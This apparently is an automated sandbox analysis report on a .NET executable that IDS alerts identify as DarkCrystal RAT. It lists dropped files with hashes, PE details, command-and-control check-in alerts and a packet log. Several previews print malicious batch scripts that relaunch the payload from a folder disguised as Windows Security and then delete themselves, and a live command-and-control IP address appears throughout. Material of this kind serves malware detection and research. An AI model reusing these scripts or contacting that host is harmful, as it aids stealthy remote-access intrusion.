SHA-256:	25682FD1E38766EB7483BC3EB02269861E51CFBDA5E3BD84C1ABEC23EFDAE5F5
SHA-512:	C938C0A5B8325601B5258EE6BB994374176CAA05D2E3B7FA01E64373A9484E9968F40FE7AC861CABF7EA73089701EA9C18E1D628F97B31293A86E0134FF95BED
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\RKW7EBQnZE.bat"

C:\Users\user\AppData\Local\Temp\SRst0rCoYd

Download File

Process:	C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.243856189774724
Encrypted:	false
SSDEEP:	3:ZIUzij/d2c:+Mu/l
MD5:	A9820AFE0A394F7E478522267BDE8BF9
SHA1:	4F3CC230B64D27DEC1BD1687C3AE723180687D1B
SHA-256:	7560FA1A2D84FB8FD0B1CE346075DFF4EBC95C2D57CD401EA5E86494B120C286
SHA-512:	9DDA6A3FBB6D17353B6ECDB19117C847F5EADFFAA35C4EB20BC59D080379022673F928B3D736A52E4B33BC25ED680985E10EF3C627B4ABA745D9A7C34DC6097F
Malicious:	false
Preview:	4sIFLYVT1BVGyYv0sorrIE8S9

C:\Users\user\AppData\Local\Temp\UAPgkxikYd

Download File

Process:	C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.4838561897747224
Encrypted:	false
SSDEEP:	3:JQFnuM:xM
MD5:	E7CDED1F1D1109BF3F9987FDC86AE4F2
SHA1:	165C3E9376A313130623B5476969C066042D9428
SHA-256:	D9193A94E2E819287596958DE69FB98BE1DC230D3107B72A786875D0C0BDD5A0
SHA-512:	AD1E9339AA03C57B47E906EC7605C9042D15881E1A9997B13FB364A0CFBE857BE1CDF6664B8ABE374147B1B37D79D2ECEE097CE830BD24110C9DFE98C66160CE
Malicious:	false
Preview:	HAZrgxwM0cRRDhtlhqdBPNFnm

C:\Users\user\AppData\Local\Temp\VHSBHRO5Lh

Download File

Process:	C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.213660689688185
Encrypted:	false
SSDEEP:	3:Yb7e3:F3
MD5:	E67475705DCAD4C743A291DFA934F717
SHA1:	B8604968998745B353408B218A084A0D3C090C05
SHA-256:	3D467A6ADB8CD5671A12A36D7CC52E33E4443BD7462CBF8BBDC020DCC265890B
SHA-512:	8F536819F698DCF0AD36B2F1597784F294166871E035F03ADA2B33F356256CC9BBFCC7F43290A5F57A30ED57B6EE73F2E3D98DC7DDA9DC22BEA8B81FF9D94672
Malicious:	false
Preview:	cO1NIaZn8XV67mwogcND1KmcE

C:\Users\user\AppData\Local\Temp\cbmH3tD5yN

Download File

Process:	C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.083856189774724
Encrypted:	false
SSDEEP:	3:55myT021n:nhn
MD5:	E864082130CE321AAF3165FEF87D2D3B
SHA1:	78C59497719013AB9FA078D19E2E91222BA2C5CE
SHA-256:	F743B5DF219A6B5A04AEA17FAEBC8B80286A7F41FA290EB95EA6EF52DA2E4362
SHA-512:	AFA622AE23FD38A648D692FB4E48A8A75F0B56D71154F4D297B3679E582D180B15C18AD9A7548D64FCC322BE616D0D2D364C31CDE61052CF9A15980A28262D12
Malicious:	false
Preview:	e9ZT3DMJvUJqDLzSqZeUA59WP

C:\Users\user\AppData\Local\Temp\eMBuAd62pF.bat

Download File

Process:	C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	213
Entropy (8bit):	5.373627903187634
Encrypted:	false
SSDEEP:	6:hCRLuVFOOr+DEiUsq+MGLFSKOZG1wkn23fL7V0RH:CuVEOCDEiZHifGh
MD5:	5E7603967F8FCC757913DB383B10D1BC
SHA1:	6C1253EB01CE5ED5B13283D57C4E4F87E0F623BB
SHA-256:	43D53AFDC50E20C2A735912D2D48F7546F8AF8D20742BB0023F826A2DF33A305
SHA-512:	13BE9DF13F4CEE9144AAF356C0FDBCBC01B36A875F750B64235B51ACDBFBD14CEC0256802BE970FC2D060B2EE191145645854D1CB5AF6AA8EA9D19B865028088
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\eMBuAd62pF.bat"

C:\Users\user\AppData\Local\Temp\g5xIAnyS9b

Download File

Process:	C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	3.8594705707972508
Encrypted:	false
SSDEEP:	3:hX37HVn:nn
MD5:	F1C48EE3BC57DA0E8CB447C1A6FEF6D4
SHA1:	A8BC58F989C4070BF4B12F2ECAA2053AD8BBE69A
SHA-256:	AF5D3F8ECF9476750B152153E03B75DC6AAAA42CDCD9AB5FC9B110626E9A01F1
SHA-512:	2CD73A36B35DFB18A716162B5E5546B0B2C4D31A1BF17FBA9839C85C5BE96DD16C863AE581F4F3D28222F3F0FD1FB0995C72131C33A0E384A0FDEA45F0BC21DD
Malicious:	false
Preview:	03NXXhs5T9XXpeBeleebeuHnD

C:\Users\user\AppData\Local\Temp\gB4rnXAIWV

Download File

Process:	C:\Users\user\Desktop\OH6KO8NBy1.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.213660689688185
Encrypted:	false
SSDEEP:	3:WAkI/y2HN:jy2HN
MD5:	10F2E0A4E31C8F3F56AFD90E45791D53
SHA1:	965AA964A019A175BD8C04C313AE7FE38B8C19D1
SHA-256:	BF0DC113477033E055B7F60A6D69A57439139DC45090189868AF898DE6514268
SHA-512:	BC3E0F20E97CE4EDA4120D8FA3AD785BAD3B391130C7C5916F8E811C2EE2E9D653A202F4C72C0A55C4065BF34BFDAF3C34AED6F3DA8D9AC506FC184E9FEADEDB
Malicious:	false
Preview:	R8sFHeA58ZNV2nssadFE9uqah

C:\Users\user\AppData\Local\Temp\gzlPEas6c9.bat

Download File

Process:	C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	213
Entropy (8bit):	5.351201068079348
Encrypted:	false
SSDEEP:	6:hCRLuVFOOr+DEiUsq+MGLFSKOZG1wkn23fG:CuVEOCDEiZHifO
MD5:	C21D08F0B46C26FE6AF9C802C3B89070
SHA1:	6762237850D0A78C92E66F494E3114C69F6533A8
SHA-256:	345AE653DB856C2C9497868629A3C4EC228399CCAC07EEE4DE59475AE5FB2424
SHA-512:	D90C189049BE4348B80E196B211989ED6D243A7E54C938F783122AECC46F1BFA9C05309EBE8F8F34E5F3E5934DB1E6CB94577DFF16AFA555B65190E375701383
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\gzlPEas6c9.bat"

C:\Users\user\AppData\Local\Temp\lJm4VDgUuT

Download File

Process:	C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.163856189774723
Encrypted:	false
SSDEEP:	3:c0Kza3j:FK23j
MD5:	FFF56FDDEC8ACF5C1B5675957A7E5C06
SHA1:	CE014B655B5E169230265B7B14C6762325B0CCFE
SHA-256:	624D5117B3EE0D69A55A81E72056265106FC50CF5726C950ADDC0E3BEF3A345A
SHA-512:	D3422B95160C97CD99AE297BC813B7943918D3993395E597B7014911F1983E8C050F88EA4EA5EB0D3804888249155F3F80683BB66B3D31C7DC4C10E2DB49BAE1
Malicious:	false
Preview:	GSSQKT0rdAPS2Yw3xqIzScQxO

C:\Users\user\AppData\Local\Temp\qjnhz7GqHX

Download File

Process:	C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.103465189601646
Encrypted:	false
SSDEEP:	3:nqV2r:qV2r
MD5:	BBD57D212CD62152ED1E45671DFAEF2E
SHA1:	2EBD212FA95FB0C462851C05A842ED66FA6BDEFF
SHA-256:	85B4DF19DDD60BA74EE7AC53931DAE75835EB504D41892E109D1790D9AC222E1
SHA-512:	FBF29262FD9CF8E808D641B915BECDC4CCC7B4FE8865A314DA10C59FFFF560A180966F7BDE4FF0182E1E003DC2EA5FA6F61F867A4B25FCEBE8330F0C4307B56A
Malicious:	false
Preview:	jD89Gu8r3Ty6uiRNVNVFuNLa5

C:\Users\user\AppData\Local\Temp\s0zfVT6GSH

Download File

Process:	C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.133660689688185
Encrypted:	false
SSDEEP:	3:lcgrW6ARO:lRx9
MD5:	2D74F91B6AA889431546A521BCF72554
SHA1:	FD593CA7B622C15844ED297F0483DF2839AEB187
SHA-256:	3F280FACD4EAF573C2A087A92BFA414F6DDF36681A11CAEBE558D52B5F56F8F5
SHA-512:	58F7D8E40B9E5B0959622AB38C76528A81F4BB2DB941F3B483DA15346CA20A71BB2E86E0121A6C76917774F9D885EE9479D4A18CDA1BD74EEA33E5ED4CF366CD
Malicious:	false
Preview:	6s3PT2asyEoU3J9vvzsGM2Jlk

C:\Users\user\AppData\Local\Temp\x0UH1pL55G.bat

Download File

Process:	C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	261
Entropy (8bit):	5.331591412746287
Encrypted:	false
SSDEEP:	6:hCijTg3Nou1SV+DEiUsq+MGLFSKOZG1wkn23fBhn:HTg9uYDEiZHifv
MD5:	C0FC5E2459AB40F55A255F469E4BF442
SHA1:	909446D27167DEA8CD95348FBFCC2CAD9514A2D2
SHA-256:	5C32EACA53413C7CB9AEFBD7CB67C996C5F752DFC940B5A0B724C52C2A81A39A
SHA-512:	8DD06AB9460026431F32A5836B1BFE872B973065B1AAB6F8E24BBD8B675B6852543ABF9E73D5331821DCE564DB370A2B3DF800694FDECCE01B2ED923BF08724D
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\x0UH1pL55G.bat"

C:\Users\user\AppData\Local\Temp\zuhvZR4ed0.bat

Download File

Process:	C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	261
Entropy (8bit):	5.339192204645765
Encrypted:	false
SSDEEP:	6:hCijTg3Nou1SV+DEiUsq+MGLFSKOZG1wkn23fM:HTg9uYDEiZHifU
MD5:	8652ACC6BCAAF792403968833AE15774
SHA1:	E52CA30C1D541FF49C3023E7D4FDC446FD9156E9
SHA-256:	CD6A04C7E83ADDEB35F85723E4215686168F260E6FC1B66D4037241F0EA109B9
SHA-512:	E2230F7AF2D44EAEA381337ACD9DBA0DA6785FC5270CA428827F90CF828058A85904F7D8084ABCE1EAB6FC05ECB17894172C8E489E5FD14D06BED43621009752
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\zuhvZR4ed0.bat"

\Device\Null

Download File

Process:	C:\Windows\System32\PING.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	502
Entropy (8bit):	4.625122004957738
Encrypted:	false
SSDEEP:	12:PF5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:XdUOAokItULVDv
MD5:	D96E6D661CF561D197523C31BCE52BA9
SHA1:	6306196BA2056F9B10B57373EF757A0F71375641
SHA-256:	277F514AD6A4050DA3509649A772F4ABD1FFBFC0500C63774DC12EC5A9A3592E
SHA-512:	C100ADD293D907945D5858F53E367CDF5560FFBD2F58101E79AC9DF3BFD7EFF20A6DF7B861C10697EA2BB69422D6BD4D49F6821151E40DD0F526B15B60753F7F
Malicious:	false
Preview:	..Pinging 284992 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.420770523484582
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	OH6KO8NBy1.exe
File size:	1'656'320 bytes
MD5:	07a0fb75f52c87371c88f48ae80afa1b
SHA1:	a2184c8f4c5a1b81a1e8bf426db05eac504a66a0
SHA256:	51df5cf4f67d6148c92d2bdaa10596f2952371b8c3ec85d21cdf74af6274af34
SHA512:	0322117985791e69ba8e985659b7f91fcca76809c998c9ae4af5fcd98b2d757e8e18960fbe3c6d9c9ac306e5f01a78d7e70e950d3b77a80aba1698c5b69c75cb
SSDEEP:	24576:7nCWlkJXwz6a/Ji9v8yK6V3RO2GGqF252dfr3MuURBkIELgTZRZQoYyx8MU:7TAjRK61bGW2djTuBkLIX8
TLSH:	DE759E0AA6665E33D2993F3685EB041D83A1C7677553DF0B3A1F61E3A8063708A572F3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................>..........^\... ...`....@.. ....................................@................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x595c5e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x6507AC75 [Mon Sep 18 01:48:37 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x195c10	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x196000	0x370	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x198000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x193c64	0x193e00	26cb9095e241f0eef966542e5757faa9	False	0.7435554733441659	data	7.424721058319474	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x196000	0x370	0x400	c214b341aebd3f5fe0c6beb5b7dec1c1	False	0.376953125	data	2.867353130536527	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x198000	0xc	0x200	ca5d6b84f536117e0352c35b5462ef46	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x196058	0x318	data			0.44823232323232326

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-03T21:12:15.663649+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	49736	206.188.197.24	80	TCP
2025-01-03T21:12:26.304306+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	49738	206.188.197.24	80	TCP
2025-01-03T21:12:33.163719+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	49739	206.188.197.24	80	TCP
2025-01-03T21:12:43.913772+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	49740	206.188.197.24	80	TCP
2025-01-03T21:12:54.726293+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	49742	206.188.197.24	80	TCP
2025-01-03T21:13:05.523233+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	49799	206.188.197.24	80	TCP
2025-01-03T21:13:12.523236+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	49838	206.188.197.24	80	TCP
2025-01-03T21:13:19.288902+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	49879	206.188.197.24	80	TCP
2025-01-03T21:13:31.007664+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	49949	206.188.197.24	80	TCP
2025-01-03T21:13:37.726443+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	49990	206.188.197.24	80	TCP
2025-01-03T21:13:48.820248+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	50013	206.188.197.24	80	TCP
2025-01-03T21:13:59.585903+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	50014	206.188.197.24	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 3, 2025 21:12:03.937704086 CET	49730	80	192.168.2.4	206.188.197.24
Jan 3, 2025 21:12:03.942626953 CET	80	49730	206.188.197.24	192.168.2.4
Jan 3, 2025 21:12:03.942717075 CET	49730	80	192.168.2.4	206.188.197.24
Jan 3, 2025 21:12:03.943011045 CET	49730	80	192.168.2.4	206.188.197.24
Jan 3, 2025 21:12:03.947781086 CET	80	49730	206.188.197.24	192.168.2.4
Jan 3, 2025 21:12:04.289570093 CET	49730	80	192.168.2.4	206.188.197.24
Jan 3, 2025 21:12:04.294472933 CET	80	49730	206.188.197.24	192.168.2.4
Jan 3, 2025 21:12:04.609833956 CET	80	49730	206.188.197.24	192.168.2.4
Jan 3, 2025 21:12:04.663604975 CET	49730	80	192.168.2.4	206.188.197.24
Jan 3, 2025 21:12:04.977008104 CET	49730	80	192.168.2.4	206.188.197.24
Jan 3, 2025 21:12:14.898948908 CET	49736	80	192.168.2.4	206.188.197.24
Jan 3, 2025 21:12:14.903860092 CET	80	49736	206.188.197.24	192.168.2.4
Jan 3, 2025 21:12:14.903945923 CET	49736	80	192.168.2.4	206.188.197.24
Jan 3, 2025 21:12:14.904330015 CET	49736	80	192.168.2.4	206.188.197.24
Jan 3, 2025 21:12:14.909089088 CET	80	49736	206.188.197.24	192.168.2.4
Jan 3, 2025 21:12:15.257678986 CET	49736	80	192.168.2.4	206.188.197.24
Jan 3, 2025 21:12:15.262532949 CET	80	49736	206.188.197.24	192.168.2.4
Jan 3, 2025 21:12:15.607286930 CET	80	49736	206.188.197.24	192.168.2.4
Jan 3, 2025 21:12:15.663649082 CET	49736	80	192.168.2.4	206.188.197.24
Jan 3, 2025 21:12:15.859754086 CET	49736	80	192.168.2.4	206.188.197.24
Jan 3, 2025 21:12:25.620995045 CET	49738	80	192.168.2.4	206.188.197.24
Jan 3, 2025 21:12:25.625843048 CET	80	49738	206.188.197.24	192.168.2.4
Jan 3, 2025 21:12:25.625929117 CET	49738	80	192.168.2.4	206.188.197.24
Jan 3, 2025 21:12:25.626149893 CET	49738	80	192.168.2.4	206.188.197.24
Jan 3, 2025 21:12:25.630880117 CET	80	49738	206.188.197.24	192.168.2.4
Jan 3, 2025 21:12:25.976442099 CET	49738	80	192.168.2.4	206.188.197.24
Jan 3, 2025 21:12:25.981440067 CET	80	49738	206.188.197.24	192.168.2.4
Jan 3, 2025 21:12:26.260019064 CET	80	49738	206.188.197.24	192.168.2.4
Jan 3, 2025 21:12:26.304306030 CET	49738	80	192.168.2.4	206.188.197.24
Jan 3, 2025 21:12:26.750524998 CET	49738	80	192.168.2.4	206.188.197.24
Jan 3, 2025 21:12:32.472198963 CET	49739	80	192.168.2.4	206.188.197.24
Jan 3, 2025 21:12:32.477040052 CET	80	49739	206.188.197.24	192.168.2.4
Jan 3, 2025 21:12:32.477128983 CET	49739	80	192.168.2.4	206.188.197.24
Jan 3, 2025 21:12:32.477483034 CET	49739	80	192.168.2.4	206.188.197.24
Jan 3, 2025 21:12:32.482271910 CET	80	49739	206.188.197.24	192.168.2.4
Jan 3, 2025 21:12:32.835758924 CET	49739	80	192.168.2.4	206.188.197.24
Jan 3, 2025 21:12:32.840878963 CET	80	49739	206.188.197.24	192.168.2.4
Jan 3, 2025 21:12:33.122116089 CET	80	49739	206.188.197.24	192.168.2.4
Jan 3, 2025 21:12:33.163718939 CET	49739	80	192.168.2.4	206.188.197.24
Jan 3, 2025 21:12:33.312001944 CET	49739	80	192.168.2.4	206.188.197.24
Jan 3, 2025 21:12:43.255894899 CET	49740	80	192.168.2.4	206.188.197.24
Jan 3, 2025 21:12:43.260922909 CET	80	49740	206.188.197.24	192.168.2.4
Jan 3, 2025 21:12:43.261003017 CET	49740	80	192.168.2.4	206.188.197.24
Jan 3, 2025 21:12:43.261499882 CET	49740	80	192.168.2.4	206.188.197.24
Jan 3, 2025 21:12:43.266284943 CET	80	49740	206.188.197.24	192.168.2.4
Jan 3, 2025 21:12:43.617288113 CET	49740	80	192.168.2.4	206.188.197.24
Jan 3, 2025 21:12:43.622267962 CET	80	49740	206.188.197.24	192.168.2.4
Jan 3, 2025 21:12:43.867306948 CET	80	49740	206.188.197.24	192.168.2.4
Jan 3, 2025 21:12:43.913772106 CET	49740	80	192.168.2.4	206.188.197.24
Jan 3, 2025 21:12:44.165106058 CET	49740	80	192.168.2.4	206.188.197.24
Jan 3, 2025 21:12:53.991482019 CET	49742	80	192.168.2.4	206.188.197.24
Jan 3, 2025 21:12:53.996391058 CET	80	49742	206.188.197.24	192.168.2.4
Jan 3, 2025 21:12:53.996493101 CET	49742	80	192.168.2.4	206.188.197.24
Jan 3, 2025 21:12:53.996736050 CET	49742	80	192.168.2.4	206.188.197.24
Jan 3, 2025 21:12:54.001513958 CET	80	49742	206.188.197.24	192.168.2.4
Jan 3, 2025 21:12:54.354630947 CET	49742	80	192.168.2.4	206.188.197.24
Jan 3, 2025 21:12:54.359532118 CET	80	49742	206.188.197.24	192.168.2.4
Jan 3, 2025 21:12:54.677918911 CET	80	49742	206.188.197.24	192.168.2.4
Jan 3, 2025 21:12:54.726293087 CET	49742	80	192.168.2.4	206.188.197.24
Jan 3, 2025 21:12:54.990070105 CET	49742	80	192.168.2.4	206.188.197.24
Jan 3, 2025 21:13:04.791697979 CET	49799	80	192.168.2.4	206.188.197.24
Jan 3, 2025 21:13:04.796550035 CET	80	49799	206.188.197.24	192.168.2.4
Jan 3, 2025 21:13:04.796619892 CET	49799	80	192.168.2.4	206.188.197.24
Jan 3, 2025 21:13:04.796942949 CET	49799	80	192.168.2.4	206.188.197.24
Jan 3, 2025 21:13:04.801702976 CET	80	49799	206.188.197.24	192.168.2.4
Jan 3, 2025 21:13:05.148442984 CET	49799	80	192.168.2.4	206.188.197.24
Jan 3, 2025 21:13:05.153305054 CET	80	49799	206.188.197.24	192.168.2.4
Jan 3, 2025 21:13:05.468766928 CET	80	49799	206.188.197.24	192.168.2.4
Jan 3, 2025 21:13:05.523232937 CET	49799	80	192.168.2.4	206.188.197.24
Jan 3, 2025 21:13:06.196464062 CET	49799	80	192.168.2.4	206.188.197.24
Jan 3, 2025 21:13:11.778882980 CET	49838	80	192.168.2.4	206.188.197.24
Jan 3, 2025 21:13:11.783725023 CET	80	49838	206.188.197.24	192.168.2.4
Jan 3, 2025 21:13:11.783793926 CET	49838	80	192.168.2.4	206.188.197.24
